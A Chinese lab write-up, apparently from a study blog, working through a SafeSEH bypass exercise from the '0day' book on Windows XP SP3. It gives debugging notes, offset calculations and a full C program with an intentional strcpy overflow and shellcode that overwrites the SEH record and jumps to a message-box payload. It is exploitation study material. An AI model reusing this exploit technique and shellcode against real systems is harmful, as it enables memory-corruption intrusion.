0day 第11章--11.6节：利用加载模块之外的地址绕过SafeSEH

实验环境：winxp sp3 vs2010

总结一下入的坑：

(1) 变量zero的位置必须在strcpy()的后面，不然strcpy之后会将zero的值覆盖掉，导致zero不为0，触发不了异常。

void test(char * input)
{
	char str[200];
	strcpy(str,input);
	int zero=0;
	__try{
		zero = 1/zero;
		}
	__except(My Exception())
	{
	}

（2）当进入跳板地址0x00290b0b，call [esp+0x30]时，一直进不去……最后在0x00290b0b处下硬件断点进去之后，发现程序是这个样子

难道不应该是call [esp+0x30]这个样子吗？
这样就无法跟踪代码，无法查看流程了啊。。。

最后！！！

同学说是不是因为调试器的问题，程序知道咱们用OD调试她了……

于是用OD attach……成功了！

[注意]
当attach之后通过view查看seh链是找不到0x00290b0b的，只有当strcpy之后才会出现，所以要运行完strcpy后才能对其下硬件断点！

-----------------------------------分割线-------------------------------------------

难点：为什么要用call [ebp+0x30]当跳板？？为什么它恰好能调到短跳转位置（即next SEH的指针处）？？？

回答：

----------------------------------分割线-------------------------------------------

分析程序

首先将shellcode设为16个’\x90’进行程序的测试。
然后用OD attach程序（release版本的代码很奇怪，没有strcpy函数，只有一串mov，add命令进行复制），停到strcpy结束处

此时右下角观察堆栈，发现shellcode被复制到0x0013FE88处，

此时最近的SEH在0x0013FF60处，二者相差了216个字节，所以我们需要填充220(216+4)个字节，在221~224位置处插入跳板地址。

这里我们用到跳板地址是0x00290b0b（call [esp+0x30]），它会将程序直接调到“指向下一个SEH记录的指针”处，这里也就是0x0013FF60。由于跳板地址包含0x00，因此我们要将shellcode放到跳板地址之前，否则shellcode会被截断！

这里我们用到短跳转指令和长跳转指令，因为短跳转指令最多只能跳到128个字节处，不够，而又不能只利用长跳转指令，因此二者结合。
于是shellcode这样编写：

于是最终程序就如下所示：

#include <stdio.h>
#include <string.h>
#include <windows.h>

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" 
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" 
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" 
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" 
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" 
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" 
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" 
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" 
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" 
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" 
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xe9\x2b\xff\xff\xff\x90\x90\x90"
"\xeb\xf6\x90\x90"
//"\x54\x4f\xfa\x7f"; //测试call esi用的（NO）
//"\x64\x55\xfa\x7f"; //测试call edi用的(NO)
"\x0b\x0b\x29\x00";

DWORD MyException(void)
{
	printf("There is an exception");
	getchar();
	return 1;
}
void test(char * input)
{
	
	char str[200];	
	strcpy(str,input);
	int zero=0;
	__try
	{
		zero=1/zero;
	}
	__except(MyException())
	{
	}
}
int main()
{
	//__asm int 3
	getchar();
	printf("OK\n");
	test(shellcode);
	return 0;
}

测试程序流程是否正确，将程序断在跳板地址处，F7进入，观察到程序果然直接直接跳到短跳转处，接着调到长跳转，最后调到shellcode……


最后，弹框出现！